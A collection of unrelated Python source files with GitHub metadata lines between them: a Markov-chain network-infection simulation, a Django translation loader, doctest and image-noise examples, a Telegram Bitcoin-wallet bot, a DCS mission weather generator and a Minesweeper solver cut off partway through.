- Psp - Psc NetDevices[u]['trans_matrix'][1][2] = Psc else: for n in nset: if NetDevices[n]['factual_state'] in states[2:]: count += 1 factor = (Psc + (count / len(nset))) / 2 NetDevices[u]['trans_matrix'][1][1] = np.round_(1 - Psp - factor, prec) NetDevices[u]['trans_matrix'][1][2] = np.round_(factor, prec) def setFactualState(j, NetDevices): ref = states.index(NetDevices[j]['factual_state']) comp = np.argmax(NetDevices[j]['init_vector']) if NetDevices[j]['trans_matrix'][ref][comp] == 0: if ref == 3: comp = ref elif ref == 2 and comp == 1: if NetDevices[j]['init_vector'][0] == 0: comp = 3 else: comp = 0 elif NetDevices[j]['init_vector'][ref + 1] == 0: comp = 0 else: comp = ref + 1 return states[comp] def manualBuildNetwork(N, MT): base_MT = MT; edges = [] nodes = [(x+1) for x in range(N)] for y in nodes: fs = '' while fs not in states: fs = input('Ingrese el estado del nodo '+str(y)+' (Protegido, Susceptible, Comprometido o Irrecuperable): ') n_chain = input('Ingrese los vecinos del nodo ' + str(y) + ' separados por comas: ').split(',') neighbors = [int(n) for n in n_chain] createNode(y, fs, neighbors, base_MT, False) for n in neighbors: edges.append([y, n]) return graphNetwork(nodes, edges) def UIBuildNetwork(Nstates, Nedges, MT): nodes, edges = [(x+1) for x in range(len(Nedges))], [] for y in nodes: fs = Nstates[y-1] n_chain = Nedges[y-1].split(',') neighbors = [int(n) for n in n_chain] createNode(y, fs, neighbors, MT, False) for n in neighbors: edges.append([y, n]) return nodes, edges, NetDevices def autoBuildNetwork(N, topology, MT): base_MT = MT; edges, adjust = [], False nodes = [(x+1) for x in range(N)] for y in nodes: fs, neighbors = randomFactualState(states), [] if y == 1: for x in range(N): NetDevices[x + 1] = {'factual_state': '', 'init_vector': [], 'trans_matrix': [], 'neighbors': []} if topology == 'Lineal': if y < N: neighbors.append(y + 1) if y > 1: neighbors.append(y - 1) elif topology == 'Anillo': if y < N: neighbors.append(y + 1) if y > 1: 
neighbors.append(y - 1) if y in (1, N): neighbors.append(N - y + 1) elif topology == 'Estrella': if y == 1: neighbors = range(2, N + 1) else: neighbors = [1] elif topology == 'Cuadricula': if y < N: neighbors.append(y + 1) if y > 1: neighbors.append(y - 1) if y % 2 == 0 and y in range(3, 10): neighbors.append(1) if y in (2, 9) and N >= 9: neighbors.append(11 - y) if y == 1: neighbors.extend(range(4, np.min([N+1, 8]), 2)) elif topology == 'Malla': prev = len(NetDevices[y]['neighbors']) limnodes = np.min([N, 5-prev]) if limnodes > 1: tries, checks, adjust = np.random.randint(1, limnodes), 0, True while checks < tries: randneighbor = np.random.randint(1, N+1) if y != randneighbor and randneighbor not in neighbors: neighbors.append(randneighbor) checks += 1 createNode(y, fs, neighbors, MT, adjust) for n in neighbors: edges.append([y, n]) #graphNetwork(nodes, edges) return NetDevices def graphNetwork(nodes, edges): NetGraph = nx.Graph() NetGraph.add_nodes_from(nodes) nx.set_node_attributes(NetGraph, NetDevices) NetGraph.add_edges_from(edges) MC = plt.figure(figsize=(8, 6)) pos = nx.kamada_kawai_layout(NetGraph) nx.draw_networkx_nodes(NetGraph, pos, cmap=plt.get_cmap('jet'), node_size=1250, node_color='cyan') nx.draw_networkx_labels(NetGraph, pos) nx.draw_networkx_edges(NetGraph, pos) plt.show() return MC def scanDistribution(N, NetDevices): sums = np.array([0, 0, 0, 0]) for z in range(N): sums[states.index(NetDevices[z + 1]['factual_state'])] += 1 sums = sums / N return sums def spotNodeStates(N, NetDevices): nodestates = np.array([0]*N) for z in range(N): nodestates[z] = states.index(NetDevices[z + 1]['factual_state']) return nodestates def performStepAllNodes(N, NetDevices, Psp, Psc): report, statereg = '', '' #print('Distribution: ' + str(scanDistribution(N))) for a in range(1, N + 1): #report += str(NetDevices[a]['init_vector']) + ' ' #statereg += str(NetDevices[a]['factual_state']) + ' ' setNeighborFactor(a, NetDevices, Psp, Psc) 
#print(NetDevices[a]['init_vector'], NetDevices[a]['trans_matrix']) step = np.matmul(NetDevices[a]['init_vector'], NetDevices[a]['trans_matrix']) NetDevices[a]['init_vector'] = np.around(step, prec) NetDevices[a]['factual_state'] = setFactualState(a, NetDevices) #print(report + '\n', statereg) return scanDistribution(N, NetDevices) def paintProgressMC(progress): BP = plt.figure() plt.xlabel('Time (t)') plt.ylabel('Probability (P)') for p in progress: plt.plot(p) plt.legend(states) plt.show() return BP def getPlots(progress, temps, comparetemps, context): plt.plot(progress) plt.title('Pps = {0}, Psp = {1}, Psc = {2}, Pcp = {3}, Pci = {4} \nInitialization Vector = {5}' .format(Pps, Psp, Psc, Pcp, Pci, context)) plt.legend(states) plt.xlabel('Time (t)') plt.ylabel('Probability (P)') plt.show() difftemps = list(map(list, zip(temps, comparetemps))) plt.plot(difftemps) plt.title('Comparación de tiempos de ejecución conforme avanza el algoritmo') plt.legend(['Múltiple', 'Simple']) plt.xlabel('Moment (t)') plt.ylabel('Execution Time (ms)') plt.show() def retrieveHeatMap(infection, nodes, moments): HMNS = plt.figure() plt.xlabel('Time (t)') plt.ylabel('Nodes') plt.imshow(infection, cmap='hot_r', aspect='auto', extent=[1, nodes, moments, 0]) plt.show() infection = [] return HMNS def start(): N = int(input('Ingrese el número de nodos de la red: ')) NetGraph = manualBuildNetwork(N, base_MT) input('Press Enter to continue...') num_nodes = len(NetGraph.nodes) context = scanDistribution(num_nodes) progress, temps, c, executime = [context], [0], 0, 0 while c < t_lim: start_time = time() progress.append(performStepAllNodes(num_nodes, NetDevices, Psp, Psc)) total_time = time() - start_time executime += (total_time*1000); c += 1 temps.append(executime) comparetemps = SMC.start(N) getPlots(progress, temps, comparetemps, context) #paintProgressMC() retrieveHeatMap(HeatMap, len(HeatMap), len(HeatMap[0])) #means = getMeanTime(matriz_transicion, vector_inverso) #for m in 
range(len(means)): print('Tiempo medio desde el estado', Estados[m]+': ', means[m]) if __name__ == '__main__': start()
Zharet-Bautista-Montes/Markov_Inspector
venv/core/MultipleMC.py
MultipleMC.py
py
9,302
python
en
code
0
github-code
36
18935365420
# pylint: disable=too-many-locals, duplicate-code """Management command that loads locale .po files into database.""" from __future__ import unicode_literals import json from os.path import join, isdir from django.conf import settings from django.core.management.base import BaseCommand as LoadCommand, CommandError from django.apps import apps from babel.messages.pofile import read_po def setattr_by_json_path(json_object, path, value): """Recursive function that sets a string value given a JSON xpath.""" first_id = path.find("#") second_id = path.find("#", first_id + 1) first_key = path.find("/") second_key = path.find("/", first_key + 1) indices = [x for x in [first_id, second_id, first_key, second_key] if x > 0] indices.sort() indices.append(len(path) + 1) if path[0] == "#" and isinstance(json_object, list): child_id = path[1:indices[0]] path_remainder = path[indices[0]:] for sub_object in json_object: try: if sub_object["id"] == child_id: setattr_by_json_path(sub_object, path_remainder, value) except KeyError: pass elif path[0] == "/" and isinstance(json_object, dict): child_key = path[1:indices[0]] path_remainder = path[indices[0]:] try: sub_object = json_object[child_key] if isinstance(sub_object, str): json_object[child_key] = value else: setattr_by_json_path(sub_object, path_remainder, value) except KeyError: pass return json_object class Command(LoadCommand): """Management command that loads locale .po files into database.""" def handle(self, *args, **options): """Handle the load_trans command.""" po_filename = "nav.po" locale_path = settings.MODELTRANSLATION_LOCALE_PATH if not isdir(locale_path): raise CommandError("Locale directory does not exists.") for lang in [lang_tup[0] for lang_tup in list(settings.LANGUAGES)]: if lang != "en": lang_path = join(locale_path, lang) if not isdir(lang_path): raise CommandError("Language directory does not exists.") po_file = open(join(lang_path, "LC_MESSAGES", po_filename), "r", encoding="utf-8") catalog = 
read_po(po_file) po_file.close() for message in catalog: if message.string not in [None, "None", ""] and message.auto_comments: for field_id in message.auto_comments: [app, class_name, primary_key, field, json_path] = field_id.split('.') model = apps.get_model(app, class_name) try: obj = model.objects.get(pk=primary_key) except model.DoesNotExist: continue if json_path == "": setattr(obj, field, message.string) obj.save() else: msg_data = getattr(obj, field).raw_data tr_json_path = "%s_%s" % (json_path[:-3], lang) msg_data = setattr_by_json_path(msg_data, tr_json_path, message.string) setattr(obj, field, json.dumps(msg_data)) obj.save()
IATI/IATI-Standard-Website
modeltranslation_sync/management/commands/load_trans_nav.py
load_trans_nav.py
py
3,582
python
en
code
5
github-code
36
11622358382
def factorial(n: int) -> int: """Return the factorial of n, an exact integer >= 0. Args: n (int): n! Returns: int. The factorial value:: >>> factorial(5) 120 >>> factorial(0) 1 >>> factorial(-1) Traceback (most recent call last): ... ValueError: Only non-negative inputs are expected """ assert isinstance(n, int) if n < 0: raise ValueError("Only non-negative inputs are expected") if n == 0: return 1 return n * factorial(n - 1) # -------------------------------------------------------------------- if __name__ == "__main__": import doctest doctest.testmod()
UiO-IN3110/UiO-IN3110.github.io
lectures/python/factorial_doctest_exceptions.py
factorial_doctest_exceptions.py
py
678
python
en
code
21
github-code
36
25971972492
number=5 if type(number) == int: print("resultado: ",number*2) else: print("El dato no es numerico") def mensaje (men): print(men) mensaje("Mi primer Programa") mensaje("Miu segundo Programa")
PovedaJose/EjerciciosDePython
Practicas#1/Ejercicio#1.py
Ejercicio#1.py
py
216
python
es
code
1
github-code
36
17169329371
import os import telebot from dotenv import load_dotenv import client load_dotenv() bot_token = os.getenv('BOT_TOKEN') admin = os.getenv('TG_ADMIN_ID') bot = telebot.TeleBot(bot_token) states_list = ["ADDRESS", "AMOUNT", "CONFIRM"] states_of_users = {} @bot.message_handler(commands=['start']) def start_message(message): """ markup: создаем объект для работы с кнопками (row_width - определяет количество кнопок по ширине) создаем три кнопки, типа:KeyboardButton отправляем пользователю три кнопки типа:KeyboardButton после команды /start. """ try: client.create_user({"tg_ID": message.from_user.id, "nick": message.from_user.username}) except Exception as e: return e markup = telebot.types.ReplyKeyboardMarkup( row_width=3, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Кошелек') btn2 = telebot.types.KeyboardButton('Перевести') btn3 = telebot.types.KeyboardButton('История') btn4 = telebot.types.KeyboardButton('Админ') markup.add(btn1, btn2, btn3, btn4) text: str = f'Привет {message.from_user.full_name}, я твой бот-криптокошелек, \n' \ 'у меня ты можешь хранить и отправлять биткоины' bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler(regexp='Кошелек') def wallet(message): wallet = client.get_user_wallet_by_tg_id(message.from_user.id) markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) text = (f'Ваш баланс: {wallet["balance"]} BTC \n' f'Ваш адрес: {wallet["address"]}') bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler(regexp='История транзакций') def history(message): transactions = client.get_user_transactions( client.get_user_by_tg_id(message.from_user.id)["id"]) markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) text = f'Ваши транзакции: \n{transactions}' bot.send_message(message.chat.id, text, reply_markup=markup) 
@bot.message_handler(regexp='Перевести') def transaction(message): markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) text = f'Введите адрес кошелька куда хотите перевести: ' bot.send_message(message.chat.id, text, reply_markup=markup) # тут мы даём юзеру состояние при котором ему будет возвращаться следующее # сообщение states_of_users[message.from_user.id] = {"STATE": "ADDRESS"} @bot.message_handler(regexp='История') def history(message): markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) transactions = ['1', '2', '3'] # сюда мы загрузим транзакции text = f'Ваши транзакции{transactions}' bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler(regexp='Меню') def menu(message): markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Кошелек') btn2 = telebot.types.KeyboardButton('Перевести') btn3 = telebot.types.KeyboardButton('История') markup.add(btn1, btn2, btn3) text = f'Главное меню' bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler(func=lambda message: message.from_user.id == admin and message.text == 'Админ') def admin_panel(message): if message.from_user.id != admin: markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) bot.send_message( message.chat.id, 'У вас нет прав администратора.', reply_markup=markup) else: markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True) btn1 = telebot.types.KeyboardButton('Общий баланс') btn2 = telebot.types.KeyboardButton('Все юзеры') btn3 = telebot.types.KeyboardButton('Данные по юзеру') btn4 = telebot.types.KeyboardButton('Удалить юзера') markup.add(btn1, btn2, btn3, btn4) text = f'Админ-панель' 
bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler(func=lambda message: message.from_user.id == admin and message.text == "Все юзеры") def show_all_users(message): text = f'Юзеры:' users = client.get_users() inline_markup = telebot.types.InlineKeyboardMarkup() for user in users: inline_markup.add(telebot.types.InlineKeyboardButton( text=f'Юзер: {user["tg_ID"]}', callback_data=f'user_{user["tg_ID"]}' )) bot.send_message(message.chat.id, text, reply_markup=inline_markup) @bot.callback_query_handler(func=lambda call: True) def callback_query(call): query_type = call.data.split('_')[0] users = client.get_users() if query_type == 'user': user_id = call.data.split('_')[1] inline_markup = telebot.types.InlineKeyboardMarkup() for user in users: if str(user['tg_ID']) == user_id: inline_markup.add( telebot.types.InlineKeyboardButton( text="Назад", callback_data='users'), telebot.types.InlineKeyboardButton( text="Удалить юзера", callback_data=f'delete_user_{user_id}')) bot.edit_message_text( text=f'Данные по юзеру:\n' f'ID: {user["tg_ID"]}\n' f'Ник: {user.get("nick")}\n' f'Баланс: {client.get_user_balance_by_id(user["id"])}', chat_id=call.message.chat.id, message_id=call.message.message_id, reply_markup=inline_markup) print(f"Запрошен {user}") break if query_type == 'users': inline_markup = telebot.types.InlineKeyboardMarkup() for user in users: inline_markup.add( telebot.types.InlineKeyboardButton( text=f'Юзер: {user["tg_ID"]}', callback_data=f"user_{user['tg_ID']}")) bot.edit_message_text( text="Юзеры:", chat_id=call.message.chat.id, message_id=call.message.message_id, reply_markup=inline_markup) # прикрепляем нашу разметку к ответному сообщению if query_type == 'delete' and call.data.split('_')[1] == 'user': user_id = int(call.data.split('_')[2]) for i, user in enumerate(users): if user['tg_ID'] == user_id: print(f'Удален Юзер: {users[i]}') client.delete_user(users.pop(i)['id']) inline_markup = telebot.types.InlineKeyboardMarkup() for user in 
users: inline_markup.add( telebot.types.InlineKeyboardButton( text=f'Юзер: {user["tg_ID"]}', callback_data=f"user_{user['tg_ID']}")) bot.edit_message_text( text="Юзеры:", chat_id=call.message.chat.id, message_id=call.message.message_id, reply_markup=inline_markup ) @bot.message_handler(func=lambda message: message.from_user.id == admin and message.text == "Общий баланс") def total_balance(message): total_bal = client.get_total_balance() markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Меню') btn2 = telebot.types.KeyboardButton('Админка') markup.add(btn1, btn2) text = f'Общий баланс: {total_bal} BTC' bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler( func=lambda message: states_of_users.get( message.from_user.id)["STATE"] == 'AMOUNT') def get_confirmation_of_transaction(message): if message.text == "Меню": del states_of_users[message.from_user.id] menu(message) markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) if message.text.isdigit(): text = f'Вы хотите перевести {message.text} сатоши,\n' \ f'на биткоин-адрес {states_of_users[message.from_user.id]["ADDRESS"]}: ' confirm = telebot.types.KeyboardButton('Подтверждаю') markup.add(confirm) bot.send_message(message.chat.id, text, reply_markup=markup) # тут мы даём юзеру состояние при котором ему будет возвращаться # следующее сообщение states_of_users[message.from_user.id]["STATE"] = "CONFIRM" states_of_users[message.from_user.id]["AMOUNT"] = int(message.text) else: text = f'Вы ввели не число, попробуйте заново: ' bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler( func=lambda message: states_of_users.get( message.from_user.id)["STATE"] == 'CONFIRM') def get_hash_of_transaction(message): if message.text == "Меню": del states_of_users[message.from_user.id] menu(message) elif message.text == 
"Подтверждаю": bot.send_message( message.chat.id, f" Ваша транзакция: " + str(client.create_transaction(message.from_user.id, states_of_users[message.from_user.id]['ADDRESS'], states_of_users[message.from_user.id]['AMOUNT'])) ) del states_of_users[message.from_user.id] menu(message) @bot.message_handler( func=lambda message: states_of_users.get( message.from_user.id)["STATE"] == 'ADDRESS') def get_amount_of_transaction(message): if message.text == "Меню": del states_of_users[message.from_user.id] menu(message) markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) text = f'Введите сумму в сатоши, которую хотите перевести: ' bot.send_message(message.chat.id, text, reply_markup=markup) # тут мы даём юзеру состояние при котором ему будет возвращаться следующее # сообщение states_of_users[message.from_user.id]["STATE"] = "AMOUNT" states_of_users[message.from_user.id]["ADDRESS"] = message.text bot.infinity_polling(timeout=10)
Lexxar91/bitcoin_api_bot
tg_bot/bot.py
bot.py
py
12,039
python
ru
code
0
github-code
36
40568587585
from datetime import datetime from typing import Optional from dcs.mission import Mission from game.weather.atmosphericconditions import AtmosphericConditions from game.weather.clouds import Clouds from game.weather.conditions import Conditions from game.weather.fog import Fog from game.weather.wind import WindConditions class EnvironmentGenerator: def __init__( self, mission: Mission, conditions: Conditions, time: datetime ) -> None: self.mission = mission self.conditions = conditions self.time = time def set_atmospheric(self, atmospheric: AtmosphericConditions) -> None: self.mission.weather.qnh = atmospheric.qnh.mm_hg self.mission.weather.season_temperature = atmospheric.temperature_celsius self.mission.weather.turbulence_at_ground = int(atmospheric.turbulence_per_10cm) def set_clouds(self, clouds: Optional[Clouds]) -> None: if clouds is None: return self.mission.weather.clouds_base = clouds.base self.mission.weather.clouds_thickness = clouds.thickness self.mission.weather.clouds_density = clouds.density self.mission.weather.clouds_iprecptns = clouds.precipitation self.mission.weather.clouds_preset = clouds.preset def set_fog(self, fog: Optional[Fog]) -> None: if fog is None: return self.mission.weather.fog_visibility = int(fog.visibility.meters) self.mission.weather.fog_thickness = fog.thickness def set_wind(self, wind: WindConditions) -> None: self.mission.weather.wind_at_ground = wind.at_0m self.mission.weather.wind_at_2000 = wind.at_2000m self.mission.weather.wind_at_8000 = wind.at_8000m def generate(self) -> None: self.mission.start_time = self.time self.set_atmospheric(self.conditions.weather.atmospheric) self.set_clouds(self.conditions.weather.clouds) self.set_fog(self.conditions.weather.fog) self.set_wind(self.conditions.weather.wind)
dcs-liberation/dcs_liberation
game/missiongenerator/environmentgenerator.py
environmentgenerator.py
py
2,028
python
en
code
647
github-code
36
35378767894
#!/usr/bin/env python3 """SERVICE YET TO BE IMPLEMENTED. THIS FILE IS JUST A PLACEHOLDER.""" print("Sorry! This service has not yet been implemented\n(will you be the one to take care of it?\n --- RIGHT NOW THIS FILE IS JUST AN HANDY PLACEHOLDER ---") exit(0) #!/usr/bin/env python3 from sys import stderr, stdout, exit, argv from random import randrange from time import monotonic from multilanguage import Env, Lang, TALcolors from TALinputs import TALinput # METADATA OF THIS TAL_SERVICE: problem="problem_name" service="service_name" args_list = [ ('arg1',int), ('arg2',str), ('arg3',bool), ('lang',str), ('META_TTY',bool), ] ENV =Env(problem, service, args_list) TAc =TALcolors(ENV) LANG=Lang(ENV, TAc, lambda fstring: eval(f"f'{fstring}'")) TAc.print(LANG.opening_msg, "green") # START CODING YOUR SERVICE: gen_new_s = True for _ in range(ENV['num_questions']): pass
romeorizzi/TALight
TAL_utils/problem_maker/templates/service_server_placeholder.py
service_server_placeholder.py
py
909
python
en
code
11
github-code
36
27435754821
import os import pathlib import numpy as np import matplotlib.pyplot as plt from matplotlib.image import imsave, imread def add_noise(noise_type, image): if noise_type == "gauss": shp = image.shape mean = 0 var = 0.01 sigma = var ** 0.5 gauss = np.random.normal(mean, sigma, shp) noise = image + gauss return noise if noise_type == "uniform": k = 0.5 if image.ndim == 2: row, col = image.shape noise = np.random.rand(row, col) else: row, col, chan = image.shape noise = np.random.rand(row, col, chan) noise = image + k * (noise - 0.5) return noise if noise_type == "s&p": sh = image.shape s_vs_p = 0.5 amount = 0.05 out = np.copy(image) num_salt = np.ceil(amount * image.size * s_vs_p) coords = [np.random.randint(0, i - 1, int(num_salt)) for i in sh] out[coords] = 1 num_peper = np.ceil(amount * image.size * (1.0 - s_vs_p)) coords = [np.random.randint(0, i - 1, int(num_peper)) for i in sh] out[coords] = 0 return out if noise_type == "poisson": PEAK = 20 noisy = image + np.random.poisson(0.5 * PEAK, image.shape) / PEAK return noisy if noise_type == "speckle": if image.ndim == 2: row, col = image.shape noise = np.random.randn(row, col) else: row, col, chan = image.shape noise = np.random.randn(row, col, chan) noisy = image + image * 0.5 * noise return noisy def read_images_1(img_path): row, column = 3, 2 # Original picture fig = plt.figure(img_path) plt.axis("off") img = imread(img_path) fig.add_subplot(row, column, 1, title="Original") plt.imshow(img, cmap="gray") plt.axis("off") fig.add_subplot(row, column, 2, title="Gauss") plt.imshow(add_noise("gauss", img), cmap="gray") plt.axis("off") fig.add_subplot(row, column, 3, title="Uniform") plt.imshow(add_noise("uniform", img), cmap="gray") plt.axis("off") fig.add_subplot(row, column, 4, title="s&p") plt.imshow(add_noise("s&p", img), cmap="gray") plt.axis("off") fig.add_subplot(row, column, 5, title="Poisson") plt.imshow(add_noise("poisson", img), cmap="gray") plt.axis("off") fig.add_subplot(row, column, 6, title="Speckle") 
plt.imshow(add_noise("speckle", img), cmap="gray") plt.axis("off") plt.show(block=True) if __name__ == "__main__": img_path = os.path.join(pathlib.Path(__file__).parent.parent, "input1", "coins.png") read_images_1(img_path)
206081/psio
Lab2/zad1.py
zad1.py
py
2,703
python
en
code
0
github-code
36
29138207241
from random import randint as rand import pygame import time row_max =16 column_max =16 mine_count = 50 square_list = [] square_size = 30 BLACK = (0,0,0) WHITE = (255,255,255) BLUE = (0,0,255) RED = (255,0,0) pygame.init() stage = "setup" check_list = [] screen = pygame.display.set_mode((square_size*column_max, square_size*row_max)) pygame.display.set_caption("Minesweeper") class square: def __init__(self, row, column): self.row = row self.column = column self.mine = False self.hidden = True self.flag = False self.mark_mine = False self.mark_safe = False def adjacents(self, choice): adjacent_list = [] empty_list = [] for row_difference in range(-1,2): new_row = self.row + row_difference for column_difference in range(-1,2): new_column = self.column + column_difference if (0 <= new_column < column_max) and (0 <= new_row < row_max) and not (column_difference == 0 and row_difference == 0): adjacent_list.append([self.row+row_difference, self.column + column_difference]) output_list = [] for item in adjacent_list: thing = square_list[item[0]][item[1]] output_list.append(thing) if thing.hidden and not thing.flag: empty_list.append(thing) if choice == 0: return output_list else: return empty_list def adjacent_mines(self, type): num_mines = 0 num_safe = 0 num_hidden = 0 num_flag = 0 num_blank = 0 for item in self.adjacents(0): if item.mine: num_mines += 1 else: num_safe +=1 if item.hidden: num_hidden +=1 if item.flag: num_flag +=1 else: num_blank += 1 if type == 'm': return num_mines elif type == 's': return num_safe elif type == "h": return num_hidden elif type == "f": return num_flag elif type == "b": return num_blank def draw_me(self): if self.hidden: colour = WHITE text_colour = BLACK text = "F" else: colour = BLACK text_colour = WHITE text = str(self.adjacent_mines("m")) pygame.draw.rect(screen, colour, (self.column*square_size, self.row*square_size, square_size, square_size)) if ((not self.hidden) or self.flag) and text != "0": font = pygame.font.SysFont(None, 
square_size) screen.blit(font.render(text, True, text_colour), (self.column *square_size + square_size/3, self.row*square_size + square_size/3)) def reveal(self): global reveal_count global stage global win global check_list if self.hidden: reveal_count += 1 self.flag = False if self.mine: stage = "end" win = False print(self.row, self.column) else: self.hidden = False check_win() if self.adjacent_mines("m") == 0: for item in self.adjacents(0): if item.hidden: item.reveal() if self.adjacent_mines("b") > 0: check_list.append(self) def autocomplete(self): worked = False if (not self.hidden) and self.adjacent_mines("b") > 0: if self.adjacent_mines("b") == self.adjacent_mines("m")-self.adjacent_mines("f"): worked = True for item in self.adjacents(1): item.flag = True elif self.adjacent_mines("m") == self.adjacent_mines("f"): worked = True for item in self.adjacents(1): item.reveal() return worked for row in range(row_max): square_list.append([]) for column in range(column_max): square_object = square(row, column) square_list[row].append(square_object) def setup(chosen_row, chosen_column): global reveal_count square_list[chosen_row][chosen_column].hidden = False reveal_count = 1 for item in square_list[chosen_row][chosen_column].adjacents(0): item.hidden = False reveal_count += 1 for _ in range(mine_count): valid = False while not valid: valid = True random_column = rand(0, column_max-1) random_row = rand(0, row_max -1) if square_list[random_row][random_column].mine or (not square_list[random_row][random_column].hidden): valid = False else: square_list[random_row][random_column].mine = True for item in square_list[random_row][random_column].adjacents(0): if item.adjacent_mines('s') == 0: valid = False square_list[random_row][random_column].mine = False break for row in square_list: for item in row: if not item.hidden: item.reveal() def draw_grid(): for i in range(row_max + 1): pygame.draw.line(screen, BLUE, (0, i*square_size), (column_max*square_size, i*square_size)) 
for i in range(column_max + 1): pygame.draw.line(screen, BLUE, (i*square_size, 0), (i*square_size, row_max*square_size)) def draw_board(): for row in square_list: for item in row: item.draw_me() draw_grid() def list_possibilities(num_things, num_spaces): if num_things > num_spaces: return([]) elif num_things == 0: string = "" for _ in range(num_spaces): string += "0" return([string]) else: output_list = [] position_list = [] for _ in range(num_things): position_list.append("") def recursive(ordinal, smaller): nonlocal output_list nonlocal position_list for current in range(smaller+1, num_spaces -ordinal ): position_list[ordinal] = current if ordinal == 0: placeholder = [] for item in position_list: placeholder.append(item) output_list.append(placeholder) else: recursive(ordinal - 1, current) recursive(num_things-1, -1) return output_list def wait(): draw_board() pygame.display.update() def brute(working): global check_list for square in check_list: print(square.row, square.column) wait() if working: print("going") working = False count = 0 for i in range(len(check_list)): if stage == "play": item = check_list[count] if item.adjacent_mines("b") > 0: attempt = item.autocomplete() pygame.event.get() if attempt: working = True del check_list[count] wait() check_win() else: count += 1 else: del check_list[count] else: break else: print("stuck") wait() stuck_v2() # thread = threading.Thread(stuck()) # thread.start() # thread.join() working = True check_win() return working def check_board(): valid = True for row in square_list: for item in row: if (not item.hidden) and item.adjacent_mines("m") > 0: suspicious_count = 0 for adjacent in item.adjacents(0): if adjacent.flag or adjacent.mark_mine: suspicious_count += 1 if suspicious_count != item.adjacent_mines("m"): valid = False break return valid def check_win(): global win global stage if reveal_count == row_max*column_max - mine_count: stage = "end" win = True timer_event = pygame.USEREVENT + 1 
pygame.time.set_timer(timer_event, 1) def game(option): global screen global stage global win global check_list win = False done = False screen.fill(WHITE) draw_grid() autocomplete_working = True stage_done = True while not done: for event in pygame.event.get(): if event.type == pygame.QUIT: done = True if stage == "setup": if option == "c": setup(rand(0, row_max-1), rand(0,column_max-1)) stage = "play" draw_board() for row in square_list: for square in row: if not square.hidden and square.adjacent_mines("b") > 0: check_list.append(square) wait() time.sleep(1.5) if event.type == pygame.MOUSEBUTTONDOWN and option == "p": mouse_row = pygame.mouse.get_pos()[1]//square_size mouse_column = pygame.mouse.get_pos()[0]//square_size setup(mouse_row, mouse_column) stage = "play" draw_board() elif stage == "play": if event.type == pygame.MOUSEBUTTONDOWN and option == "p": mouse_row = pygame.mouse.get_pos()[1]//square_size mouse_column = pygame.mouse.get_pos()[0]//square_size button = event.button if button == 1: if square_list[mouse_row][mouse_column].hidden: square_list[mouse_row][mouse_column].reveal() else: _ = square_list[mouse_row][mouse_column].autocomplete() print(square_possibilities(square_list[mouse_row][mouse_column])) check_win() draw_board() #Left click elif button == 3: #Right click square_list[mouse_row][mouse_column].flag = not square_list[mouse_row][mouse_column].flag draw_board() print(square_possibilities(square_list[mouse_row][mouse_column])) elif option == "c" and event.type == timer_event: autocomplete_working = brute(autocomplete_working) elif stage == "end": if stage_done == True: if win == False: print("lose") # for row in square_list: # for square in row: # if square.flag: # print(square.row, square.column, "flag") else: print("win") if option == "c": for row in square_list: for item in row: if not item.flag and item.hidden: item.flag = True wait() stage_done = False # # if event.type == pygame.MOUSEBUTTONDOWN: # # done = True # # else: # if win: # 
text = "You Win!" # else: # text = "You Lose!" # screen.fill(BLACK) # font = pygame.font.SysFont(None, square_size) # screen.blit(font.render(text, True, WHITE), (square_size*column_max/3, square_size*row_max/3)) pygame.display.update() def square_possibilities(square): spaces = square.adjacent_mines("b") temp_list = list_possibilities(square.adjacent_mines("m") - square.adjacent_mines("f"), spaces) output_list = [] for item in temp_list: binary_string = '' for i in range(spaces): if i in item: binary_string += "1" else: binary_string += "0" output_list.append(binary_string) return output_list def convert_overlap(indexes, string): new_bin = "" for index in indexes: new_bin += string[index] return new_bin #reduce string to just overlaps def make_new_bin(overlap_indexes, possibilities): output_list = [] for bin in possibilities: new_bin = convert_overlap(overlap_indexes, bin) if new_bin not in output_list: output_list.append(new_bin) return output_list #make new list of just overlap possibilities def check_in_list(possibility_list, indexes, overlap_possibilities): count = 0 for i in range(len(possibility_list)): if convert_overlap(indexes, possibility_list[count]) not in overlap_possibilities: possibility_list.pop(count) else: count += 1 return possibility_list #Cull board_possibilities to possible lists def stuck_v2(): global check_list num_flags = 0 for row in square_list: for item in row: if item.flag: num_flags += 1 board_possibilities = square_possibilities(check_list[0]) # for item in check_list: # print(item.row, item.column, item.hidden) keys = check_list[0].adjacents(1) for key in keys: print(key.row, key.column, "key") # for key in keys: # print("keys", key.row, key.column) big_success = False for k in range(1,len(check_list)): for key in keys: print(key.row, key.column, "key") item = check_list[k] # print(item, item.row, item.column) big_overlap_indexes = [] small_overlap_indexes = [] item_adjacents = item.adjacents(1) # for adjacent in item_adjacents: # # 
